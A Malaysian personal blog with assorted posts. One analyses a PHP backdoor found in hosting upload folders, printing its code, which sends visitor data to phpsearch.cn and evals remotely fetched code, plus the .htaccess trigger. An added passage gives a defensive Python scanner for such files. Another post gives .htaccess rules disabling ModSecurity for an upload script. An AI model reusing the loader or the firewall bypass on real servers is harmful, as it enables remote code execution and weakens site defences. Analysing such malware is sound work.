More Than 48 Hours Offline

It has been a while since I spent time at home without going online. As a matter of fact I don’t remember at all when such an event has occurred before.

48 hours, strictly speaking, because 50 hours ago I did check my Gmail for 5 minutes. The truth is that I have not been online since Sunday. So this is it, the only thing that can keep me from getting online is the little guy who revealed himself to the world on the Eve of Aidiladha 🙂

And I am online right now just to check out some forms and make sure that everything that needs to be paid has been paid. I am going to stay and work from home, most probably until February. However I'm gonna stop by the office for a while tomorrow to send in some documents.

Oh yes BTW I’ve got to mention that I had the best experience at JPN (National Registration Department) Putrajaya on the 10th. It took me less than 30 minutes to settle the registration. That is really really cool and deserves a good mention.

It’s a totally different world for me now… exciting and scary at the same time. Wish me luck!!!

Thanks a lot for all the text, instant and email messages. I'm sorry if I missed replying to some.

I am not sure when I will be able to get online next and update this site but I will try to find time.

Gmail Stickers!

I was casually browsing the Official Gmail Blog this morning and saw that Gmail is giving away free Gmail stickers. The only thing you need to do is to send a self-stamped envelope to:

Send me some Gmail stickers already
P.O. Box 391420
Mountain View, CA 94039-1420

For international requests, you need to send the envelope along with an International Reply Coupon (IRC).

Unfortunately for me and other Malaysians, Pos Malaysia does not sell IRC. Yes, I called them at 1 300 300 300 hotline and they said they don’t have the service. Bummer! I am so disappointed!

I wonder if Google accepts cheques, or could just deduct it from my AdSense account already!

Google @enstek

From conversations I had with my colleagues at work, and from other friends, I heard that Google is going to have a presence in Malaysia, specifically at @enstek in Sepang. It's a new flagship area opening its wings to tech companies from all over the globe.

Is this really true? In some stories I even heard that construction work has started at the site. I would really appreciate it if anyone could point me in the right direction. Googling doesn't help as the keywords are too common.

From my point of view, a Google presence is definitely welcome in Malaysia. There will be new job opportunities and I know for sure people will jump with joy and try their best to get into the company. As for me, I don't think I am well qualified yet to work for a gigantic company like Google. But who knows… I don't have a crystal ball to show me my future.

What about you? Will you try your luck if Google starts recruiting in Malaysia?

This Is Not SPAM

For the past 2 weeks I have been receiving funny and annoying emails that start exactly like this:

And each of them is actually promoting a different program, e.g. easy money, forex investments. Translation:

Don’t these idiots know that when they start sending unrequested emails to multiple recipients at the same time, it’s considered SPAM?

So if I see one of them and kick them I can say: “I am not kicking you”.

Starbucks Sizing System

I was watching HBO when one of the short features aired between the movies came on. It was about the new movie "Role Models". I have always wondered why Starbucks has the sizing system "Tall" (small), "Grande" (medium), and "Venti" (large). It's plain weird.

Interestingly Danny Donahue (played by Paul Rudd) mentioned this directly in the movie:

LMFAO. “Congratulations, you’re stupid in 3 languages.”

Cosmic Bowl Sucks

Well, to be really honest, the lighting and the loud music are really cool. However I feel that the bowling alley is poorly maintained. Discolored screens and malfunctioning equipment really helped to spoil the mood for a good bowling night.

I was playing in lane 36 on Friday after work and I counted at least 8 malfunctions. Either the pinsetter didn't place any pins, or the spotting tongs kept knocking one pin off. It sucks and it really spoiled the playing mood.

I don't recommend Cosmic Bowl Mid Valley for company events or casual games.

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be image, pdf, and video files in the upload folders but there were also .htaccess and PHP files in the main upload folder and each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough – it's difficult to handle Flash upload security, so I used some very basic techniques to prevent illegal uploads. However I decided to venture into Internet Webhosting's server (I also have an account there) and saw the same thing happening on a fellow blogger's WordPress upload folder – which coincidentally is on the same server as my other account. I have so many "other" accounts I sometimes lose track.

Testing further I found that I am able to manipulate files located in other users' upload folders if the permission 777 (drwxrwxrwx) is set. I was able to create new files, move existing files, and even worse, delete them. Technically this is because the webserver process (apache for Apache 1.x and httpd for Apache 2.x) usually runs as the user nobody or another common user account on the server. So it really does not matter who runs a PHP file from the browser, the server thinks the user always has the proper permission.

So on normal shared hosting other users are actually able to copy your source code if you're running custom code (in contrast to WordPress, which is publicly available anyway).

This problem does not relate to other parts of the website or the database.

I am NOT going to post the code that I used to check and test these claims, so it's really up to you whether or not to trust me.

However the following code was in the foreign PHP files (they are named using numbers – XXXXX.php), and it was all on one line, most probably to prevent people from understanding it. I cleaned it up to improve readability.

 1  <?php
 2  error_reporting(0);
 3  $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
 4  $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
 5  $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
 6  $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
 7  $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
 8  $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
 9  $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
10  $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
11  $i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
12  $j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
13
14  $z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
15  $f = base64_decode("cGhwc2VhcmNoLmNu");
16  if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd")
17      $f = $_REQUEST["id"];
18  if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
19  else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
20      eval($c);
21  else
22  {
23      $cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
24      curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
25      $o = curl_exec($cu);
26      curl_close($cu);
27      eval($o);
28  };
29  ?>

Lines 3-12 collect data about the request.
Line 14 dumps all of the collected information into the variable $z.
$f is the variable that holds the host name of the culprit: phpsearch.cn

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 handle some special queries (I think for when the request comes from the culprits themselves).
Line 18 tries to include the remote file http://ads1.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file http://7.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcu');

And the final attempt, in lines 23-27, tries to use the cURL extension to load http://71.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcxLg==');

How is this possible? Well, they also uploaded .htaccess files that look like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates if a 404 (file not found) is encountered in the folder. But still, I don't like the intrusion. Wouldn't you?

I can’t really think of any workaround to the permission problem as users will always have to change the permission of upload folder to 777. Even changing the group ownership to the group used by the httpd process will not prevent access to other users.

However GoDaddy seems to have a good technique for overcoming this problem, as I can't access other users' folders there. It has been a while since I wanted to find out how they implemented it – I noticed it the first time I used their hosting, since I didn't have to change permissions on my upload folders.
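As an added example (my own, not code from the post), here is a Python check a hosting customer could run over an upload tree to spot exactly this pattern: world-writable directories, PHP files where only media should be, and .htaccess files that hand 404s to a PHP script, decoding any base64 literals in the PHP to reveal the hosts it contacts. The extension allowlist, the sample tree and the file names are constructed for the demo; the two base64 strings are the ones quoted from the dropped file above.

```python
import base64, os, re, shutil, stat, tempfile

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".mp4", ".flv"}  # constructed allowlist
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
ERRORDOC_PHP = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(\S+\.php)\s*$", re.I | re.M)

def decode_literals(php_source):
    """Decode every base64_decode("...") literal in PHP source, revealing hidden host names."""
    decoded = []
    for lit in B64_LITERAL.findall(php_source):
        try:
            decoded.append(base64.b64decode(lit).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable>")
    return decoded

def scan_upload_dir(root):
    """Return (path, reason) findings: world-writable dirs, PHP files, .htaccess 404 handlers."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((dirpath, "directory is world-writable (777)"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for target in ERRORDOC_PHP.findall(fh.read()):
                        findings.append((path, f"ErrorDocument hands 404s to PHP file {target}"))
            elif ext == ".php":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.append((path, f"PHP in upload folder, decoded literals: {decode_literals(fh.read())}"))
            elif ext not in ALLOWED_EXT:
                findings.append((path, f"unexpected file type {ext or '(none)'}"))
    return findings

def demo():
    """Build a constructed sample tree mimicking the intrusion, scan it, and clean up."""
    root = tempfile.mkdtemp()
    sub = os.path.join(root, "subfolder")
    os.mkdir(sub)
    os.chmod(sub, 0o777)  # the 777 permission the post describes
    with open(os.path.join(sub, ".htaccess"), "w") as fh:
        fh.write("Options -MultiViews\nErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php\n")
    with open(os.path.join(sub, "XXXXXX.php"), "w") as fh:  # only the two literals quoted in the post
        fh.write('<?php $f = base64_decode("cGhwc2VhcmNoLmNu"); $u = base64_decode("aHR0cDovL2FkczEu");')
    findings = scan_upload_dir(root)
    shutil.rmtree(root)  # remove the constructed tree
    return findings
```

Run `scan_upload_dir()` against a real upload directory (read-only, no files are modified) and review each finding by hand; the 777 finding stays until the host offers a per-user webserver identity like the GoDaddy setup mentioned above.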

PayPal in Bahasa Melayu

I recently received an email from PayPal announcing that they now support additional languages. One of them is my native tongue, Bahasa Melayu.

However when I clicked on the Malaysia flag it directed me to the same page as Bahasa Indonesia. Although many parts of the Internet have already acknowledged that these two languages are different, I am a tad surprised that PayPal is not one of them 🙂


2.59MB/Sec Download

I had to download the Flex SDK for work today and when I saw the file size I thought I could take some time for a coffee and a smoke break, but I was wrong. I am not making a big deal of it, but I guess home users in Malaysia have never experienced this before.

The 118MB file was downloaded in less than a minute!

Oh yes, the file was downloaded to a server at the HQ in Massachusetts.

How I wish I could get that at home! I am wondering whether US homes also get the same kind of speed. My dear US readers, could you please shed some light on this for us?

Weird IP Mismatch on TMNET Network

Tonight's Internet access was annoyingly slow so I thought of recycling my ADSL connection. Out of habit I opened up WhatIsMyIP.us and was presented with a weird IP.

The top text with black background is the actual IP my router was assigned with (60.52.127.200).

And then I recycled my ADSL connection. The new IP was 60.50.203.72. However when I opened the site above again it still showed me the old IP. There is something fishy about this.

I tried ProxyWay and here’s what I got:

And here’s from CheckIP:

The two sites that gave me the correct and matching IP are IPChicken and IP-adress:

What the hell is wrong? Since TMNET has the reputation of doing stupid things right now I am thinking that they are testing some kind of HTTP bypassing. This is because the other traffic that I tested was not affected (e.g. SSH and FTP) and I see my “real” IP fine.

Is anyone else experiencing this twilight-zone scenario?

What Happened to Marché Mövenpick

I went to have lunch at The Curve on Saturday and I was a bit disappointed by the lack of staff and all the waiting we had to do. While I understand that the system is for you to order and wait, they should not have asked people to come back in 5 minutes if we actually had to wait for 20.

I was ordering the 1/2 Roasted Chicken meal and the guy attending the stall was also the same guy cooking the mixed vegetables at the next stall. And the funniest thing of all is that while the menu said roasted chicken, they were actually reheating it on the grill. Yes, on the grill. So the chicken got charred and tasted like charcoal, and lost all its moisture. The vegetables were all dried up, and I think that the menu has been changed (many meals have been removed).

The roasted chicken in the same restaurant used to be moist, juicy and the gravy was superb. This time they provided BBQ sauce.

And using the grill also means that it takes a lot longer than the oven. I saw that the oven was switched off, so I think this may be a step to cut some costs?

What’s wrong with the restaurant? Are they so affected by the economy that they decided to provide improper food, lousy service, and jeopardize the whole business?

I won't be visiting this restaurant anytime soon unless someone really wants to eat something from the menu (the mixed vege and the sauteed mushrooms still taste the same). I'll just go to Kenny Rogers for roasted chicken.

Flash Uploader Error

I was using YUI Uploader for a personal project and it worked very well on my development notebook and server. However when the code went live on the production server the Flash uploader failed with this error message:

[IOErrorEvent type="ioError" bubbles=false cancelable=false eventPhase=2 text="Error #2038"]

After a while I realized that it must be something server-side, because when I used Wireshark to look at the traffic the server was returning HTTP Error 500. The traffic is not captured by Firebug because it is Flash traffic.

The culprit is ModSecurity, a third-party module used by most hosting companies. ModSecurity is a web application firewall that can run either embedded in Apache or as a reverse proxy.

A quick fix to allow uploads is to include the following in the .htaccess file. The three blocks cover the different Apache and ModSecurity versions, and because each is wrapped in an IfModule directive, no error is thrown when that module is unavailable. This relieves you of having to find out which version of Apache and ModSecurity is used on the server.

For this example the script that handles the upload is named upload.php.

# Apache 1.x and ModSecurity 1.x
<IfModule mod_security.c>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 1.x
<IfModule security_module>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 2.x
<IfModule security2_module>
   <Files upload.php>
      SecRuleEngine Off
      SecRequestBodyAccess Off
   </Files>
</IfModule>

That’s it! This fixes the Flash uploader problem.

By the way, it might be useful to know that this issue was encountered on a server hosted under the Ebiz Linux package by Exabytes.

Help Find Ozzie the Golden Retriever

[UPDATE] Ozzie was actually taken by a neighbor's friend who thought the dog was lost. Ozzie was scared of thunder and wandered over to a Hari Raya open house nearby, where the house owner asked his Chinese friend to bring Ozzie home. Ozzie is now back with the rightful owner he loves. [END UPDATE]

If you hang out or live around Bandar Utama or TTDI and see this guy, please help by calling 012 335 2308. I haven't heard the story of how she lost Ozzie yet.

He is cream-colored, 4 years old (ask him if you meet him), about 3 feet tall and does not bark meaninglessly. He’s a lovely dog but I never met him because I am afraid of canines.

Here’s a flyer she gave to me if anyone would like to help distribute: Lost – Ozzie – Golden Retriever